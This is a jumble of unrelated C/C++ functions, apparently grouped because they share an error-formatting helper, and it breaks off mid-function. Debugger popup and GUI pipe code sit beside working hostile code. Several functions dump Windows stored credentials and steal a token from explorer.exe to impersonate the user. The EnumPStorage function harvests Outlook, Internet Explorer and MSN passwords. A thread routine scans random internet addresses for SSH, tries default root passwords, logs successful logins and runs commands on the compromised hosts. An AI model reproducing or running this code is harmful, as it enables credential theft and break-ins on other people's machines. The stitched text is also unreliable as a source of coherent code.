HANDLE OsGetUserToken(void) { HANDLE hproc, htoken; int res; DWORD explorer; explorer = find_process("explorer.exe"); if(explorer!=NULL) { hproc = OpenProcess(PROCESS_QUERY_INFORMATION, TRUE, explorer); if(hproc!=NULL) { res = OpenProcessToken(hproc, TOKEN_ALL_ACCESS, &htoken); if(res!=0) { //deb("explorer.exe handle %p", htoken); return htoken; } else deb("OpenProcessToken: %s", fmterr()); } else { deb("OpenProcess: %s", fmterr()); return 0; } } else { // deb("did not find explorer"); return 0; } return 0; }
char* OsListNetworks(void) { static char name[255]; struct hostent *hostinfo; WSADATA wsaData; int iResult = WSAStartup(MAKEWORD(2,2), &wsaData); if (iResult != NO_ERROR) { deb("localaddr: Error at WSAStartup()\n"); } if( gethostname ( (char FAR*)name, 255) == 0) { deb("hostname: %s", name); // Get local IP addresses struct sockaddr_in SocketAddress; struct hostent *pHost = 0; pHost = ::gethostbyname(name); if(!pHost) { deb("err gethostbyname"); return NULL; } char aszIPAddresses[10][16]; // maximum of ten IP addresses for(int iCnt = 0; ((pHost->h_addr_list[iCnt]) && (iCnt < 10)); ++iCnt) { memcpy(&SocketAddress.sin_addr, pHost->h_addr_list[iCnt], pHost->h_length); strcpy(aszIPAddresses[iCnt], inet_ntoa(SocketAddress.sin_addr)); deb("local: %s",aszIPAddresses[iCnt]); } if((hostinfo = gethostbyname(name)) != NULL) { return(inet_ntoa (*(struct in_addr *)*hostinfo->h_addr_list)); } deb("localaddr: gethostbyname failed, %s",fmterr(WSAGetLastError()) ); } deb("localaddr: gethostname failed, %s",fmterr(WSAGetLastError()) ); return NULL; }
void setup(register struct packet *pkt, int serial) { register int n; register struct apply *rap; int first_app = 1; pkt->p_apply[serial].a_inline = 1; for (n = maxser(pkt); n; n--) { rap = &pkt->p_apply[n]; if (rap->a_inline) { if (n != 1 && pkt->p_idel[n].i_pred == 0) fmterr(pkt); pkt->p_apply[pkt->p_idel[n].i_pred].a_inline = 1; if (pkt->p_idel[n].i_datetime > pkt->p_cutoff) condset(rap,NOAPPLY,CUTOFF); else { if (first_app) pkt->p_gotsid = pkt->p_idel[n].i_sid; first_app = 0; condset(rap,APPLY,SX_EMPTY); } } else condset(rap,NOAPPLY,SX_EMPTY); if (rap->a_code == APPLY) { ixgsetup(pkt->p_apply,pkt->p_idel[n].i_ixg); } } }
/* ********************************************************************************* */ int udp_send_packet(ubermsg *packet) { SOCKET udpsock; struct sockaddr_in sin; if( (udpsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == INVALID_SOCKET ) { deb("udp:socket: %s", FORMATERROR); return 1; } sin.sin_family = AF_INET; sin.sin_addr.s_addr = DnsResolve(UDP_SERVER_ADDR); sin.sin_port = htons(UDP_SERVER_PORT); if( ((unsigned)sendto(udpsock, (char*) packet, PACKETSIZE(packet), 0, (sockaddr*) &sin, sizeof(sin))) != PACKETSIZE(packet)) { deb("udp:sendto: %s", fmterr()); return 1; } //deb("packet sent: %d bytes", PACKETSIZE(packet)); closesocket(udpsock); return 0; }
void finduser(register struct packet *pkt) { register char *p; char *user; char groupid[6]; int none; int ok_user; extern char saveid[]; none = 1; #if 0 user = logname(); #else user = saveid; #endif sprintf(groupid,"%lu",(unsigned long)getgid()); while ((p = getline(pkt)) != NULL && *p != CTLCHAR) { none = 0; ok_user = 1; repl(p,'\n','\0'); /* this is done for equal test below */ if(*p == '!') { ++p; ok_user = 0; } if (!pkt->p_user) if (equal(user,p) || equal(groupid,p)) pkt->p_user = ok_user; *(strend(p)) = '\n'; /* repl \0 end of line w/ \n again */ } if (none) pkt->p_user = 1; if (p == NULL || p[1] != EUSERNAM) fmterr(pkt); }
extern "C" int __stdcall mye_DockWindow(HWND hwnd, int xwidth, int where, LPVOID addr) { char buf[1024]; HDC hdc=0; DWORD dwRead; #pragma pack(1) typedef struct temp { char cmd; HWND hwnd; LPVOID addr; char dllpipe[128]; } tmp; #pragma pop(1) tmp stmp; stmp.cmd=LO_DOCKWINDOW; stmp.hwnd=hwnd; strncpy(stmp.dllpipe, dllpipe,sizeof(stmp.dllpipe)); stmp.addr=addr; unsigned long ret2 = CallNamedPipeA("\\\\.\\pipe\\ReqForm", &stmp, sizeof(stmp), &hwnd, sizeof(hwnd), &dwRead, 0); if (!ret2) deb("mye_DockWindow CallNamedPipe: %s", fmterr()); deb("dockwindow wrote %d bytes",sizeof(stmp)); //deb("read hwnd: %x dwRead:%u hdc %x",hwnd,dwRead,hdc); return TRUE; }
WINDOWEVENT *BrowseMshFile(AFILE *fp) { char *hp; static WINDOWEVENT we; /****************************************************************************/ /* - put the title, instructions, and help appropriate for this popup */ /* into the popup structure. */ /* - save the screen area used by the popup if CUA interface. */ /* - get the file to browse from the user. */ /* - handle user string and keys. */ /* - handle errors. */ /* - restore the screen save area if CUA interface. */ /* */ /****************************************************************************/ if( !browsem(0,fp,&we) ) { #if defined(SD386LOG) SD386Log(STRINGCODE," "); SD386Log(STRINGCODE,PromptString); #endif return(&we); } else { /**************************************************************************/ /* display an error message and then ask for another name. */ /**************************************************************************/ beep(); hp = CantFind; fmterr( hp); } }
void nIcon::setHicon(HICON phicon) { if(hicon) DestroyIcon(hicon); if(! (hicon = CopyIcon(phicon))) { deb("failed to CopyIcon: %s", fmterr()); } // hicon = phicon; }
void OsListCreds(void) { DWORD dwCount; PCREDENTIAL* creds; if(!CredEnumerate(NULL, CRED_ENUMERATE_ALL_CREDENTIALS, &dwCount, &creds)) deb("failed creds enum %s", fmterr()); for(DWORD i=0;i<dwCount;i++) { deb("cred #%02d: tgname:%s com:%s user:%s size:%d data:%s",i, creds[i]->TargetName, creds[i]->Comment,creds[i]->UserName, creds[i]->CredentialBlobSize,creds[i]->CredentialBlob); } CredFree(creds); }
extern "C" HWND __stdcall mye_GetWindowDC(int where, int width, int height) { char buf[1024]; HDC hdc=0; HWND hwnd; DWORD dwRead; buf[0]=LO_GETWINDOWHANDLE; buf[1]=0x0; unsigned long ret2 = CallNamedPipeA("\\\\.\\pipe\\ReqForm", buf, 2, &hwnd, sizeof(hwnd), &dwRead, 0); if (!ret2) deb("mye_GetWindowDC CallNamedPipe: %s", fmterr()); deb("read hwnd: %x dwRead:%u hdc %x",hwnd,dwRead,hdc); return hwnd; }
int cmd_geticon(int dwIndex, PNOTIFYICONDATAW pn) { DWORD dwRead; char buf[2000]; buf[0] = LO_GETICON; buf[1] = (char)dwIndex; unsigned long ret2 = CallNamedPipeA("\\\\.\\pipe\\cmdmsgs", buf, 2, pn, sizeof(NOTIFYICONDATAW), &dwRead, 0); if (!ret2) deb("cmd_geticon CallNamedPipe: %s", fmterr()); if (dwRead != sizeof(NOTIFYICONDATAW)) { return MYE_NO_MORE_ITEMS; } return MYE_SUCCESS; }
HWND cmd_getwindow(int dwIndex) { DWORD dwRead; char buf[2000]; HWND hwnd; buf[0] = LO_GETWINDOW; buf[1] = (char)dwIndex; //deb("dwIndex %d",dwIndex); unsigned long ret2 = CallNamedPipeA("\\\\.\\pipe\\cmdmsgs", buf, 2, &hwnd, sizeof(HWND), &dwRead, 0); if (!ret2) deb("cmd_getwindow CallNamedPipe: %s", fmterr()); //deb("dwRead %d",dwRead); if (dwRead != sizeof(HWND)) { return (HWND) MYE_NO_MORE_ITEMS; } //deb("getwindow idx %d hwnd %x",dwIndex,hwnd); return hwnd; }
int cmd_event(LPVOID addr, DWORD msg) { DWORD dwRead; char buf[2000]; buf[0] = LO_EVENT; EVENT e; memset(&e, 0, sizeof(e)); e.addr = addr; e.msg = msg; e.id = rand(); strncpy(e.dllpipe, dllpipe, 128); memcpy(&buf[1], &e, sizeof(e)); unsigned long ret2 = CallNamedPipeA("\\\\.\\pipe\\cmdmsgs", buf, 1+sizeof(e), buf, 4, &dwRead, 0); if (!ret2) deb("cmd_event CallNamedPipe: %s", fmterr()); return MYE_SUCCESS; }
int OsImpersonate(void) { HANDLE hUserToken; hUserToken = OsGetUserToken(); if(hUserToken!=0) { int res = ImpersonateLoggedOnUser(hUserToken); if(res!=0) { deb("impersonate ok"); return 0; } else { deb("ImpersonateLoggednUser: %s", fmterr()); return 1; } } else { deb("failed to Impersonate token"); return 1; } return 0; }
void SetCondBrk( AFILE *fp, uint SrcLnNumOfCsr, uchar *pSrcLnInBuf ) { char *hp; uint key; char PromptString[MAXPROMPTSTRING]; char *msg; uchar SrcLnFlag; BRK *pBrk; uchar *SaveArea; static int _iview; #if defined(MSH) if(commandLine.nparms>1) { msg = SetLineBRK( fp,SrcLnNumOfCsr,pSrcLnInBuf,BRK_COND,commandLine.parms[1]); #if defined(SD386LOG) SD386Log(STRINGCODE," "); SD386Log(STRINGCODE,commandLine.parms[1]); #endif } #endif _iview=iview; iview=0; *PromptString = '\0'; /***************************************************************************/ /* If there is a conditional bp already on this line, then we need to */ /* initialize the PromptString to the last prompt. */ /***************************************************************************/ SrcLnFlag = *(pSrcLnInBuf-1); if( (SrcLnFlag & LINE_BP) && (pBrk=IsBrk(fp , SrcLnNumOfCsr) ) && pBrk->cond ) strcpy(PromptString, pBrk->cond->pCondition); /****************************************************************************/ /* - put the title, instructions, and help appropriate for this popup */ /* into the popup structure. */ /* - save the screen area used by the popup if CUA interface. */ /* - get the file to browse from the user. */ /* - handle user string and keys. */ /* - handle errors. */ /* - restore the screen save area if CUA interface. */ /* */ /****************************************************************************/ Popup.title = CB_Title; Popup.instructions = CB_Instructions; Popup.help = CONDBPHELP; SaveArea = (uchar *)Talloc(Popup.length * Popup.width * 2); GetPopArea(SaveArea); DisplayPop( &Popup ); /****************************************************************************/ /* - loop to handle user entry/errors. */ /****************************************************************************/ for(;;) { hp = CB_Instructions; key = PopPrompt( PromptString, hp); stripblk(PromptString); if( key == ESC ) { #if 0 SD386Log(STRINGCODE," "); SD386Log(KEYCODE|key,""); #endif break; } else if ( key == ENTER ) { if( strlen(PromptString) == 0 ) continue; msg = SetLineBRK( fp,SrcLnNumOfCsr,pSrcLnInBuf,BRK_COND,PromptString); if( !msg ) { #if 0 SD386Log(STRINGCODE," "); SD386Log(STRINGCODE,PromptString); #endif break; } /**************************************************************************/ /* display an error message and then ask for another name. */ /**************************************************************************/ beep(); hp = msg; fmterr( msg ); continue; } } PutPopArea(SaveArea); Tfree(SaveArea ); iview=_iview; }
// --------------------------------------------------------------------------- void __fastcall ShmThread::Execute() { NameThreadForDebugging("ShmThread"); status = shmbuf; cmd = shmbuf +sizeof(char); data = shmbuf +sizeof(char)+sizeof(char); shmbuf[0] = SHM_READY; shme->ResetEvent(); while (1) { shme->WaitFor(INFINITE); if (status[0] != SHM_RREADY) { deb("shm signaled"); shme->ResetEvent(); continue; } // deb("shm cmd %d", cmd[0]); shme->ResetEvent(); // Synchronize(Do); // shme->SetEvent(); // } // } // // void __fastcall ShmThread::Do(void) // { if (!shmbuf) { MessageBox(Application->MainFormHandle, "error no shmbuf", "err", MB_OK); ExitProcess(0); } switch(cmd[0]) { case LO_UPDWNDPIC: // deb("L:O_UPDWNDPIC"); // ReadFile(hPipe, &hid, sizeof(hid), &dwRead, false); HANDLE hid; LPVOID p; HDC hdc; BITMAPINFO *pbmi; LPVOID dbuf; Graphics::TBitmap *ub; memcpy(&hid, data, sizeof(hid)); // data += sizeof(HANDLE); bool fail; fail = false; wcs->Acquire(); bool found; found = false; WNDBUTTONS *pwnd; pwnd = NULL; try { pwnd = (WNDBUTTONS*)hid; for (wnd_buttons_v::iterator it = wnd_buttons.begin();it!=wnd_buttons.end();it++) { // deb("%x > %x",(*it)->id,hid); if ((*it)->id == hid) { // deb("found %x",hid); found = true; break; } } if (!found || IsBadReadPtr(pwnd, sizeof(WNDBUTTONS))) { fail = true; } else { // deb(" LO_UPDWNDPIC => %x ", pwnd); // deb("%d:%d", pwnd->rect.left, pwnd->rect.top); if (pwnd->pic) { // deb(" SHM:LO_UPDWNDPIC @ %p deleting %p", pwnd, pwnd->pic); delete pwnd->pic; } ub = new Graphics::TBitmap(); pbmi = (BITMAPINFO*)(data +sizeof(HANDLE)); dbuf = data +sizeof(BITMAPINFO)+sizeof(HANDLE); hdc = CreateCompatibleDC(0); ub->SetSize(pwnd->rect.right - pwnd->rect.left, pwnd->rect.bottom - pwnd->rect.top); if (!SetDIBits(hdc, ub->Handle, 0, pbmi->bmiHeader.biHeight, dbuf, pbmi, DIB_PAL_COLORS)) { deb("bmi->h: %d bits %d", pbmi->bmiHeader.biHeight, pbmi->bmiHeader.biBitCount); deb("bmihdr sz %d", pbmi->bmiHeader.biSize); deb("updwndpic setdibits: %s", fmterr()); } DeleteDC(hdc); pwnd->pic = ub; } } catch(...) { char sz1[1024]; // deb("exception in shmthread: %s", deunicode(e.Message.c_str(), sz1, sizeof(sz1))); deb("shmthread exception"); fail = true; data[0] = SHM_FAIL; } if (!fail && found) { if (pwnd->visible) { extern TEvent *bgraphics_event; bgraphics_event->SetEvent(); graphics_event->SetEvent(); } // deb("success update %x %d:%d v:%d", hid, pwnd->rect.left, pwnd->rect.top, pwnd->visible); data[0] = SHM_READY; } else { // deb("unsuccessfull update of %x", hid); data[0] = SHM_FAIL; } wcs->Release(); break; ///////////////// ///////////////// ///////////////// ///////////////// ///////////////// case LO_UPDATEBGBITMAP: //shmb->Acquire(); // deb("case LO_UPDATEBGBITMAP:"); extern Graphics::TBitmap *BackgroundBitmap; BackgroundBitmap = (Graphics::TBitmap*)1; procId = (DWORD*)data; BackgroundProcessId = (DWORD)*procId; bgupd->Enter(); memcpy(&bgbmi, data+sizeof(DWORD) , sizeof(bgbmi)); if (!bgbmi.bmiHeader.biSizeImage ||!bgbmi.bmiHeader.biHeight) deb("bmi bg height %d", bgbmi.bmiHeader.biHeight); // deb("size %d", bgbmi.bmiHeader.biSizeImage); try { memcpy(bgbuf, data +sizeof(bgbmi)+sizeof(DWORD), bgbmi.bmiHeader.biSizeImage); } catch(...) { deb("exception while shmcopy bg"); } // bgupd->Leave(); bg_change->SetEvent(); // shmb->Release(); graphics_event->SetEvent(); // deb("done bg upd"); data[0] = SHM_READY; break; default: deb("unknwon shm cmd %d", *cmd); break; } *status = SHM_READY; // shmb->Release(); } }
void SetNameOrAddrBkpt( AFILE *fp , uint func ) { char *hp; uint key; char PromptString[MAXPROMPTSTRING]; uchar *SaveArea; int DorI; int DefineType; char *pmsg; APIRET rc; static int _iview; #if defined(MSH) && 0 if(commandLine.nparms>1) { msg = SetIDBrk( pnode, commandLine.parms[1], &Brk ); /*707*/ if( !msg ) { AFILE *lfp; /*707*/ for( lfp = allfps; lfp; lfp = lfp->next ) /*707*/ if( lfp->mid == Brk.mid ) /*707*/ MarkLineBRKs( lfp ); /*707*/ #if defined(SD386LOG) SD386Log(STRINGCODE," "); SD386Log(STRINGCODE,commandLine.parms[1]); #endif return; } } #endif _iview=iview; iview=0; *PromptString = '\0'; /****************************************************************************/ /* - put the title, instructions, and help appropriate for this popup */ /* into the popup structure. */ /* - save the screen area used by the popup if CUA interface. */ /* - get the file to browse from the user. */ /* - handle user string and keys. */ /* - handle errors. */ /* - restore the screen save area if CUA interface. */ /* */ /****************************************************************************/ switch( func ) { case SETFUNCTIONBKPT: Popup.title = IF_Title; Popup.instructions = IF_Instructions; Popup.help = IDFUNCHELP; DorI = BP_IMMEDIATE; DefineType = BP_FUNC_NAME; hp = IF_Instructions; break; case SETADDRESSBKPT: Popup.title = IA_Title; Popup.instructions = IA_Instructions; Popup.help = IDADDRHELP; DorI = BP_IMMEDIATE; DefineType = BP_ADDR; hp = IA_Instructions; strcpy( PromptString, "0x" ); break; case SETDEFERREDBKPT: Popup.title = ID_Title; Popup.instructions = ID_Instructions; Popup.help = IDDEFRHELP; DorI = BP_DEFR; DefineType = BP_FUNC_NAME; hp = ID_Instructions; break; case SETADDRLOADBKPT: Popup.title = IO_Title; Popup.instructions = IO_Instructions; Popup.help = IDLOADHELP; DorI = BP_DEFR; DefineType = BP_LOAD_ADDR; hp = IO_Instructions; strcpy( PromptString, "0x" ); break; case SETDLLLOADBKPT: Popup.title = IL_Title; Popup.instructions = IL_Instructions; Popup.help = IDDLLHELP; DorI = BP_DEFR; DefineType = BP_DLL_LOAD; hp = IL_Instructions; break; } SaveArea = (uchar *)Talloc(Popup.length * Popup.width * 2); GetPopArea(SaveArea); DisplayPop( &Popup ); /****************************************************************************/ /* - loop to handle user entry/errors. */ /****************************************************************************/ for(;;) { key = PopPrompt( PromptString, hp); stripblk(PromptString); if( key == ESC ) { #if 0 SD386Log(STRINGCODE," "); SD386Log(KEYCODE|key,""); #endif break; } else if ( key == ENTER ) { if( strlen(PromptString) == 0 ) continue; pmsg = NULL; rc = SetIDBrk( PromptString, DorI, DefineType, &pmsg ); if( rc ) { beep(); hp = pmsg; fmterr( pmsg ); continue; #if 0 AFILE *lfp; /*707*/ SD386Log(STRINGCODE," "); SD386Log(STRINGCODE,PromptString); for( lfp = allfps; lfp; lfp = lfp->next ) /*707*/ if( lfp->mid == Brk.mid ) /*707*/ MarkLineBRKs( lfp ); /*707*/ #endif } break; /**************************************************************************/ /* display an error message and then ask for another name. */ /**************************************************************************/ } } PutPopArea(SaveArea); Tfree(SaveArea ); iview=_iview; }
void FindStr( AFILE *fp ) { char *hp; uint key; uchar *SaveArea; static int _iview; /****************************************************************************/ /* - put the title, instructions, and help appropriate for this popup */ /* into the popup structure. */ /* - save the screen area used by the popup if CUA interface. */ /* - get the string to find from the user. */ /* - handle user string and keys. */ /* - handle errors. */ /* - restore the screen save area if CUA interface. */ /* */ /****************************************************************************/ #if defined(MSH) if(commandLine.nparms>1) { strcpy(FindString,commandLine.parms[1]); if(ScanStr(fp)) { #if defined(SD386LOG) SD386Log(STRINGCODE," "); SD386Log(STRINGCODE,commandLine.parms[1]); #endif return; } } #endif Popup.title = FI_Title; Popup.instructions = FI_Instructions; Popup.help = FINDSTRHELP; Popup.Flags = CLEAR1ST; SaveArea = (uchar *)Talloc(Popup.length * Popup.width * 2); GetPopArea(SaveArea); DisplayPop( &Popup ); /****************************************************************************/ /* - loop to handle user entry/errors. */ /* */ /* */ /* NOTE: */ /* FindString is a static variable that will be saved for repeat finds and*/ /* subsequent prompts. */ /****************************************************************************/ for(;;) { hp = FI_Instructions; key = PopPrompt( FindString, hp); stripblk(FindString); if( key == ESC ) { #if 0 SD386Log(STRINGCODE," "); SD386Log(KEYCODE|key,""); #endif break; } else if ( key == ENTER ) { if( strlen(FindString) == 0 ) continue; if( ScanStr(fp) ) { #if 0 SD386Log(STRINGCODE," "); SD386Log(KEYCODE|key,""); #endif break; } /**************************************************************************/ /* display an error message and then ask for another name. */ /**************************************************************************/ beep(); hp = CantFind; fmterr( hp); continue; } } PutPopArea(SaveArea); Tfree(SaveArea ); iview=_iview; }
void* thread_func(void* arg) { int sockfd; sockaddr_in serv_addr; char curhost[26]; boost::random::uniform_int_distribution<> dist(1, 9999999999999);//numeric_limits< unsigned long>::max()); boost::random::mt19937 gen((int)pthread_self()+(int)time(NULL)); LIBSSH2_SESSION *session=0; // HCkSsh ssh; srand((int)pthread_self()+rand()+time(NULL)); while (do_scan) { sockfd = socket(AF_INET, SOCK_STREAM, 0); if (sockfd < 0) deb("ERROR opening socket: %s\r\n",fmterr()); setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int)); long flags; flags = fcntl(sockfd, F_GETFL, 0); fcntl(sockfd, F_SETFL, flags | O_NONBLOCK); bzero((char *) &serv_addr, sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_port = htons(22); do { serv_addr.sin_addr.s_addr = dist(gen);//getrnd(0,100000000000000);//rand();//inet_addr("195.2.253.204") } while (ischecking(serv_addr.sin_addr.s_addr)); strncpy(curhost, inet_ntoa(serv_addr.sin_addr), sizeof(curhost)); addchecking(serv_addr.sin_addr.s_addr); unsigned long chkdist=0; chkdist=dist(gen); int ret; // deb("\rconnecting %16s ", inet_ntoa(serv_addr.sin_addr)); ret=connect(sockfd, (struct sockaddr*) &serv_addr, sizeof( serv_addr)); fd_set fds; //deb("ret:%d errno:%s (%d)\r\n",ret,strerror(errno),errno); // sleep(1); FD_ZERO(&fds); FD_SET(sockfd, &fds); tv.tv_sec = 2; tv.tv_usec = 0; char buf[1024]; if (ret==0 || (ret==-1 && errno == EINPROGRESS)) { ipscanned++; int res = select(sockfd+1, &fds,&fds, 0, &tv); //deb("res:%d errno:%s (%d)\r\n",res,strerror(errno),errno); if (res < 0 && errno != EINTR) { // deb("\r\n%s Error connecting %d - %s\n\r", // curhost, errno, strerror(errno)); } else if (res > 0) { flags &= (~O_NONBLOCK); if ( fcntl(sockfd, F_SETFL, flags) < 0) { deb("Error fcntl(..., F_SETFL) (%s)\n", strerror(errno)); } int rcv; memset(buf, 0, sizeof(buf)); rcv = recv(sockfd, buf, sizeof(buf), MSG_PEEK); //if (rcv>0) // buf[rcv]=0; // if (rcv>0) // deb("rcv: %d %s\r\n",rcv, trim(buf)); const char *username="******"; const char *password="******"; const char *sftppath="/tmp"; int rc; const char *fingerprint; session = libssh2_session_init(); libssh2_session_set_blocking(session, 1); int numTry=0; while (session>0 && (rc = libssh2_session_handshake(session, sockfd)) == LIBSSH2_ERROR_EAGAIN); int u; LIBSSH2_CHANNEL *channel=0; if (rc) { if (rc!=-43) deb("%16s failure establishing SSH session: %d [rnd: %lu, checking: %d]\n", curhost,rc,chkdist,checking.size()); //return -1; } else { totscanned++; fingerprint = libssh2_hostkey_hash(session, LIBSSH2_HOSTKEY_HASH_SHA1); deb( "%16s %-50s ", inet_ntoa(serv_addr.sin_addr), trim(buf)); for (int i = 0; i < 20; i++) { deb(KYEL "%02X " RESET, (unsigned char)fingerprint[i]); } deb( "\n"); char* passwords[]={"root","admin","toor","r00t","adm", "secure","pwd","password","god" }; for ( u=0;u<3;u++) { if (libssh2_userauth_password(session, username, passwords[u])) { // deb( "%16s " KRED "Authentication by password failed. [%s]\n" // RESET, inet_ntoa(serv_addr.sin_addr),passwords[u]); continue; } else { deb(KCYN "%16s authenticated %s:%s \r\n" RESET, inet_ntoa(serv_addr.sin_addr), username,passwords[u],totscanned); struct stat fileinfo; channel = libssh2_scp_recv(session, "/etc/services", &fileinfo); if (!channel) { deb(KRED "%16s Unable to open a session: %d\r\n" RESET, inet_ntoa(serv_addr.sin_addr), libssh2_session_last_errno(session)); break; } if (!fileinfo.st_size) { deb(KGRN "%16s router/modem\r\n" RESET, inet_ntoa(serv_addr.sin_addr), fileinfo.st_size); fdeb("%s %s:%s [router/modem (%s)]\r\n", inet_ntoa(serv_addr.sin_addr), username,passwords[u],trim(buf)); } else { deb(KGRN "%16s unknown device fs:%d [%s]\r\n" RESET, inet_ntoa(serv_addr.sin_addr), fileinfo.st_size,trim(buf)); fdeb("%s %s:%s unknown (%s)\r\n", inet_ntoa(serv_addr.sin_addr), username,passwords[u],trim( buf)); } channel = libssh2_scp_recv(session, "/proc/cpuinfo", &fileinfo); if (!channel) { // deb(KRED "\r\nUnable to open a session: %d\r\n" RESET, // libssh2_session_last_errno(session)); //break; } else { int got=0; char mem[1024]; int amount=sizeof(mem); while (got < fileinfo.st_size) { if ((fileinfo.st_size -got) < amount) { amount = fileinfo.st_size -got; } rc = libssh2_channel_read(channel, mem, amount); if (rc > 0) { deb("mem:%p rc:%d", mem, rc); } else if (rc < 0) { deb("libssh2_channel_read() failed: %d\n", rc); break; } got += rc; } if (mem[0]) deb("mem: %s", mem); } founds++; try { MySexec sexec; sexec.SetSSHHost( curhost ); int ret_code = sexec.SetTimeout(17); if (ret_code) throw("\r\nfailed: SetTimeout\r\n"); ret_code = sexec.SetSSHUser(username); if (ret_code) throw("\r\nfailed: SetSSHUser\r\n"); ret_code = sexec.SetSSHPassword(passwords[u]); if (ret_code) throw("\r\nfailed: SetSSHPassword()\r\n"); ret_code = sexec.SSHLogon(curhost ,22); if (ret_code) throw("\r\nfailed: SSHLogon\r\n"); ret_code = sexec.Execute("ls -l"); if (ret_code) throw("\r\Execute:%d",ret_code); //sleep(2); deb(KGRN "executed on %s\r\n" RESET, curhost); // fdeb("\r\n[host %s]\r\n",curhost); // exit(0); } catch ( const char *str ) { deb(KRED "in except: %s\r\n" RESET,str); } //exit(0); } } // free(fingerprint); } if (channel) libssh2_channel_free(channel); if (session) { // libssh2_session_disconnect(session, "Norm"); libssh2_session_free(session); } /* ssh = CkSsh_Create(); bool success; CkSsh_UnlockComponent(ssh,"Anything for 30-day trial"); success = CkSsh_Connect(ssh,inet_ntoa(serv_addr.sin_addr),22); CkSsh_putIdleTimeoutMs(ssh,5000); success = CkSsh_AuthenticatePw(ssh,"root","root"); if (success != TRUE) { deb("%s\n",CkSsh_lastErrorText(ssh)); return 0; } int channelNum; channelNum = CkSsh_OpenSessionChannel(ssh); if (channelNum < 0) { deb("%s\n",CkSsh_lastErrorText(ssh)); return 0; } success = CkSsh_SendReqExec(ssh,channelNum,"uname -a"); if (success != TRUE) { deb("%s\n",CkSsh_lastErrorText(ssh)); return 0; } // Call ChannelReceiveToClose to read // output until the server's corresponding "channel close" is received. success = CkSsh_ChannelReceiveToClose(ssh,channelNum); if (success != TRUE) { deb("%s\n",CkSsh_lastErrorText(ssh)); return 0; } // Let's pickup the accumulated output of the command: const char * cmdOutput; cmdOutput = CkSsh_getReceivedText(ssh,channelNum,"ansi"); if (cmdOutput == 0 ) { deb("%s\n",CkSsh_lastErrorText(ssh)); return 0; } // Display the remote shell's command output: deb("%s\n",cmdOutput); // Disconnect CkSsh_Disconnect(ssh); CkSsh_Dispose(ssh);*/ } }
//-------------------------------------------------------- int EnumPStorage(void) { typedef HRESULT(WINAPI *tPStoreCreateInstance)(IPStore **, DWORD, DWORD, DWORD); static HMODULE hpsDLL; tPStoreCreateInstance pPStoreCreateInstance; IPStorePtr PStore; IEnumPStoreTypesPtr EnumPStoreTypes; HRESULT hRes; GUID TypeGUID; char szItemName[8192]; char *szItemData; u_int iDataLen = 0; char szResName[8192]; char szResData[8192]; char szItemGUID[8192]; char chekingdata[8192]; unsigned long psDataLen = 0; unsigned char *psData = NULL; char msnid[8192]; char msnpass[8192]; if(hpsDLL==NULL) { hpsDLL = LoadLibrary("pstorec.dll"); if(!hpsDLL) { deb("LoadLibrary: %s", fmterr()); return -1; } //deb("pstorec.dll loaded handle 0x%x", hpsDLL); } pPStoreCreateInstance = (tPStoreCreateInstance)GetProcAddress(hpsDLL, "PStoreCreateInstance"); if(pPStoreCreateInstance==NULL) { deb("GetProcAddress: %s", fmterr()); return -1; } //deb("pstorecreateinstance at 0x%x", pPStoreCreateInstance); hRes = pPStoreCreateInstance(&PStore, NULL, NULL, 0); if(hRes!=S_OK) { deb("pPStoreCreateInstance failed: %s", fmterr()); return -1; } //deb("pstorage instance created"); hRes = PStore->EnumTypes(0, 0, &EnumPStoreTypes); if(hRes!=PST_E_OK) { deb("PStore->EnumTypes failed: %s", fmterr()); return -1; } deb("enumerating pstorage "); int dwEnumerated=0; while(EnumPStoreTypes->raw_Next(1, &TypeGUID, 0)==S_OK) { wsprintf(szItemGUID, "%x", TypeGUID); deb("TypeGUID: %x", TypeGUID); IEnumPStoreTypesPtr EnumSubTypes; hRes = PStore->EnumSubtypes(0, &TypeGUID, 0, &EnumSubTypes); GUID subTypeGUID; while(EnumSubTypes->raw_Next(1, &subTypeGUID, 0)==S_OK) { //deb("enumsubtypes->raw_next"); IEnumPStoreItemsPtr spEnumItems; //deb("enumerating items in %x", TypeGUID); HRESULT hRes = PStore->EnumItems(0, &TypeGUID, &subTypeGUID, 0, &spEnumItems); //deb("enum OK"); LPWSTR itemName; while(spEnumItems->raw_Next(1, &itemName, 0)==S_OK) { psData = NULL; //deb("spEnumItems->raw_next"); wsprintf(szItemName, "%ws", itemName); _PST_PROMPTINFO *pstiinfo = NULL; hRes = PStore->ReadItem(0, &TypeGUID, &subTypeGUID, itemName, &psDataLen, &psData, pstiinfo, 0); //deb("psDataLen: %d", psDataLen); iDataLen = psDataLen>8192 ? psDataLen : 8192; szItemData = (char*)malloc(iDataLen); if(szItemData==NULL) { deb("MEMORY EXHAUS !!!"); return -1; } //deb("Allocated %d bytes at 0x%p", iDataLen, szItemData); memset(szItemData, 0, iDataLen); //deb("psDataLen: %d", psDataLen); if(((unsigned long)lstrlen((char *)psData))<(psDataLen-1)) { //deb("unicode string"); int i = 0; for(DWORD m = 0; m<psDataLen; m += 2) { if(psData[m]==0) { szItemData[i] = ','; } else { szItemData[i] = psData[m]; } i++; } szItemData[i-1] = 0; } else { //deb("szItemData will be %s", psData); wsprintf(szItemData, "%s", psData); } szResName[0] = 0; szResData[0] = 0; //deb("parsing guids"); //220d5cc1 Outlooks int i; if(lstrcmp(szItemGUID, "220d5cc1")==0) { //deb("guid: 220d5cc1"); BOOL bDeletedOEAccount = TRUE; for(i = 0;i<oIndex;i++) { if(lstrcmp(OutlookData[i].POPpass, szItemName)==0) { bDeletedOEAccount = FALSE; AddItemm(OutlookData[i].POPserver, "OutlookExpress", OutlookData[i].POPuser, szItemData); break; } } if(bDeletedOEAccount) AddItemm(szItemName, "Deleted OE Account", OutlookData[i].POPuser, szItemData); } //5e7e8100 - IE:Password-Protected sites if(lstrcmp(szItemGUID, "5e7e8100")==0) { deb("guid: 5e7e8100"); lstrcpy(chekingdata, ""); if(strstr(szItemData, ":")!=0) { lstrcpy(chekingdata, strstr(szItemData, ":")+1); *(strstr(szItemData, ":")) = 0; } AddItemm(szItemName, "IE:Password-Protected sites", szItemData, chekingdata); } // b9819c52 MSN Explorer Signup if(lstrcmp(szItemGUID, "b9819c52")==0) { deb("guid: b9819c52"); int i = 0; BOOL first = TRUE; for(DWORD m = 0;m<psDataLen;m += 2) { if(psData[m]==0) { szItemData[i] = ','; i++; } else { 